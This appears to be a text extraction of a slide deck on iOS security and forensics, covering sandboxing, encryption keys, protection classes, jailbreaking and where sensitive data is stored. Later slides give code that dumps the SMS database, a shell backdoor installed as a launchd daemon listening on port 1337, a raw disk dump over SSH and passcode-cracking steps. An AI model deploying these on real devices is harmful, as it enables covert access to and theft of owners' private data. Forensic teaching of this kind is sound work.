iOS
Security and
Forensics
Powerpoint Templates
Page 1
Apple’s Security Model
- iDevice applications available on Apple
Store
- Tested, analyzed, approved, signed then
distributed by Apple services
- Installed in:
- /private/var/mobile/Applications/{Unique_App_ID}
- Full list of installed applications :
- /private/var/mobile/Library/Caches/com.apple.mobile.ins
tallation.plist
- Executed under “mobile” user in
TrustedBSD sandbox
- ASLR and DEP activated
- All that, on a fully encrypted filesystem.
Powerpoint Templates
Page 2
Apple’s Directories Sandboxing
Powerpoint Templates
Page 3
TrustedBSD Sandbox
- Open source project for FreeBSD systems
- Sponsored by Apple, Google, Yahoo!,
NSA…
- Modified and used by Apple for OS X and
iOS
- Installs series of hooks, in order to
intercept and filter syscalls.
- Policy retrieved from a human readable file
then passed to the kernel in a binary
format.
- Finally the kernel installs sanbox rules for
the process
Powerpoint Templates
Page 4
Policy rules
- Stored in /usr/share/sandbox and hardcoded in the Kernel
- Some policies configuration are done by the user through popups
- Written in ESDL schema, human readable:
(version 1)
(allow default)
(deny file-read-data (regex
#”^/private/tmp/test\.c$”))
- $ sandbox_exec –p ‘{$POLICY}’ /bin/sh
- $ file /private/tmp/test.c
test.c: cannot open: Operation not permitted
- $ sandbox_exec –n no-internet /bin/sh
- $ ping 4.2.2.2
ping: sendto: Operation not permitted
- The sandbox_init() syscall uses the libsandbox.dylib to convert the
policy into binary format.
Powerpoint Templates
Page 5
iDevice Storage Device
NAND storage device exploited like the following:
- BOOT (block 0): contains the bootloader
- PLOG (block 1) : contains the EMF, BAG1 and Dkey
- EMF : used to encrypt the entire filesystem and HFS journal
- BAG1 : used to encrypt the keybag
- Dkey : used to encrypt files without encryption policy class
- NVM (block 2-7) : stores the NVRAM parameters
- FIRM (block 8-15) : stores the firmware, iBoot, device tree & logos
- FSYS (block 16-4084): stores the encrypted filesystem
- RSRV (last 15 blocks): reserved
Powerpoint Templates
Page 6
Encryption mechanism
Starting from iPhone 3GS, Apples devices contain hardware encryption
processor. It permit the following:
- UID keys stored in the processor
- 0x835 & 0x89B keys derived from the UID key
- Filesystem :
- Data partition encrypted with EMF (AES-128)
- System partition encrypted with hardcoded AES-256 key (in
kernel & bootloaders)
- Keychain encryption with the Dkey
- The Keybag contains Master Keys for Protection Classes
- Some Master Keys encrypted with passcode
- Each file on the filesystem encrypted with a “cprotect” key
- Each “cprotect” key is encrypted with the file’s associated
Protection Class Master Key
At boot, the EMF and Dkey are extracted automatically
Powerpoint Templates
Page 7
Protection Classes
Files decryption is defined according to their associated
“Protection Classes”.
Protection Classes used for files:
- NSFileProtectionComplete: file only decrypted when the
iDevice is unlocked.
- NSFileProtectionCompleteUnlessOpen: file only decrypted
when the iDevice is unlocked. It stay decrypted even after lock if
the application maintains it open.
- NSFileProtectionCompleteUntilUserAuthentication: file
decrypted after a successful unlock. It remains decrypted until
next reboot.
- NSFileProtectionNone: file decrypted using the Dkey.
- NSFileProtectionRecovery: undocumented.
Protection Classes used for keychains:
- kSecAttrAccessibleWhenUnlocked[ThisDeviceOnly]
- kSecAttrAccessibleAfterFirstUnlock[ThisDeviceOnly]
- kSecAttrAccessibleAlways[ThisDeviceOnly]
Powerpoint Templates
Page 8
Data wiping and recovery
- Filesystem’s wiping consists of rewriting the EMF & Dkey
- Files deletion consists of rewriting the associated cprotect
- The filesystem’s journal:
- encrypted with the Dkey
- contains cprotect keys in cleartext
- rotation depending on filesystem’s activity
- could be retrieved and used to recover deleted files
- /dev/disk0s1s2 raw data backup:
- Connect the iDevice to power supply
- Disable the autolock
- Run:
$ dd if=/dev/rdisk0 bs=4k | ssh -C
username@computer_ip 'dd of=/home/{$USER}/dump.dmg'
- Wait… for… a… while….
Powerpoint Templates
Page 9
Security chain
Powerpoint Templates
Page 10
Jailbreak
- Execution of third party applications/code allowed
- Unsigned code execution granting (depending on jailbreaks)
- Complete bypass of the sandbox
- Root (/) partition mounted in read/write.
- Before jailbreak:
- $ cat /etc/fstab
/dev/disk0s1 /
/dev/disk2s1 /private/var
hfs
hfs
r
rw
0 1
0 2
hfs
hfs
rw
rw
0 1
0 2
- After jailbreak:
- $ cat /etc/fstab
/dev/disk0s1 /
/dev/disk2s1 /private/var
Note: on iOS >=5, /dev/disk2s1 became /dev/disk1s2
Powerpoint Templates
Page 11
Useful information
- launchd: first executed binary while booting (init like)
- watchdog: checks if a process is running in memory more than 5mn, if yes
it reboots the iDevice
- launchctl : used to control daemons
- $ launchctl load com.adel.reverse_shell.plist
- ldid: Link Identity Editor, used to sign a binary
- $ ldid –S my_binary
- usbmux: protocol created to encapsulate TCP over USB connections.
Optimized and used by iTune.
- XCode: developpment platform on Mac OS X, freely downloadable on
Apple Store
- Cydia Store: online non official applications store for jailbroken devices
- SSH binaries: freely available package over Cydia store.
Powerpoint Templates
Page 12
HelloWorld for iDevice
- Simple HelloWorld\n program:
- $ cat helloworld.c
#include <stdio.h>
int main(int argc, char *argv[])
{
printf(“HelloWorld\n”);
return 0;
}
- $ export PF=/Developer/Platforms/iPhoneOS.platform
- $ $PF/Developer/usr/boin/arm-apple-darwin10-llvm-gcc-4.2
-o hello hello.c -isysroot
$PF/Developer/SDKs/iPhoneOS5.0.sdk/
- Binary auto-siging:
-$ ldid –S hello
- Simple binary file transfer over SSH:
- $
scp hello root@<iDevice_IP_Addr>:/usr/bin/my_binary
Powerpoint Templates
Page 13
Local File Disclosure
-$ cat lfi_smsdb.c
#include <stdio.h>
main()
{
FILE *fp=NULL;
int c=0;
fp=fopen("/var/mobile/Library/SMS/sms.db","r");
do {
c=fgetc(fp);
printf("%c",c);
} while (!feof(fp));
fclose(fp);
return 0;
}
Powerpoint Templates
Page 14
Reverse Shell
-$ cat reverse_shell.c
#include <stdio.h>
#include <unistd.h>
main()
{
execve("/bin/sh", NULL, NULL);
return 0;
}
Powerpoint Templates
Page 15
Process Daemonizing
- Copying reverse_shell to the iDevice /usr/bin
- Copying com.adel.reverse_shell.plist to the iDevice
/System/Library/LaunchDaemons/
- Rebooting the iDevice or :
- $ cd /System/Library/LaunchDaemons
- $ launchctl load ./com.adel.reverse_shell.plist
Powerpoint Templates
Page 16
plist Manifest Format
- XML file format, used for configuration purpose
- $ cd /System/Library/LaunchDaemons
- $ cat com.adel.reverse_shell.plist
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
...
<key>Label</key>
<string>com.adel.reverse_shell</string>
<key>Program</key>
<string>/usr/bin/reverse_shell</string>
<key>Sockets</key>
<dict>
<key>Listeners</key>
<dict>
<key>SockServiceName</key>
<string>1337</string>
</dict>
</dict>
...
</plist>
Powerpoint Templates
Page 17
Physical Access Pwnage
Many possibilities:
-Easy: the iDevice does not have passcode
- Full access to data over SpringBoard, SSH or after boot on ramdisk
- Medium: the iDevice has a passcode < 4 digits
- Booting on ramdisk, patching the kernel and cracking the passcode
- Needs max 30mn of passcode cracking (10^4 possibilities)
- Medium ++: the iDevice has a passcode > 5 digits
- Could take time for cracking
- The xkcd 5$ wrench shall be used !
- Hard: the iDevice has a boot passcode (EMF + Dkey encrypted with that)
- ? Does it exist ?
Powerpoint Templates
Page 18
LiveCD vs RAMDISK
- A 2mb HFS+ container with:
- customized launchd
- binaries to copy/execute
- plist files
- Loaded into the iDevice over USB and after reboot to DFU mode
- exploit the iDevice vulnerability
- load the ramdisk on RAM
- execute launchd
- disable watchdog
- option 1:
- scan and mount the filesystem (EMF + Dkey auto-extracted)
- copy files on the filesystem
- chroot on the mounted filesystem
- option 2:
- initialize the usbmux protocol
- read and send raw NAND data over USB (EMF + Dkey must
be extracted manually
Powerpoint Templates
Page 19
Sensitive Data
- Keyboard cache
- Clipboard buffer
- Consolidated GPS positions databse and latest GPS position
- Applications and Safari snapshot cache
- Google maps cache and history
- Address book, photos, songs, voice records, notes, calendar, call history
- SMS, MMS, drafts and SpotLight SMS cache
- Geolocalization tags on photos
- Safari cache, search list, bookmarks, cookies, history and WebKit cache
- Installed applications list
- Emails, applications, their data and cache
- Lastest dialed number, bookmarked contact list, IMSI, ICCID
- Configured access point list
…
Powerpoint Templates
Page 20
Keyboard Cache
Contains the keyboard cache
- Written known and unknown words
- One cache per language
- Available in /private/var/mobile/Library/Keyboard/
Powerpoint Templates
Page 21
Keyboard Cache
Powerpoint Templates
Page 22
Applications snapshot
Available in:
$ /private/var/mobile/Library/Caches/Snapshots/{APP_NAME}/{NAME}.jpg
Powerpoint Templates
Page 23
Consolidated GPS Positions Databse
Available in:
$ /private/var/root/Library/Caches/locationd/consolidated.db
Powerpoint Templates
Page 24
Consolidated GPS Positions Databse
Available in:
$ /private/var/root/Library/Caches/locationd/consolidated.db
Powerpoint Templates
Page 25
Consolidated GPS Positions Databse
Available in:
$ /private/var/root/Library/Caches/locationd/consolidated.db
Powerpoint Templates
Page 26
End.
Questions ?
Powerpoint Templates
Page 27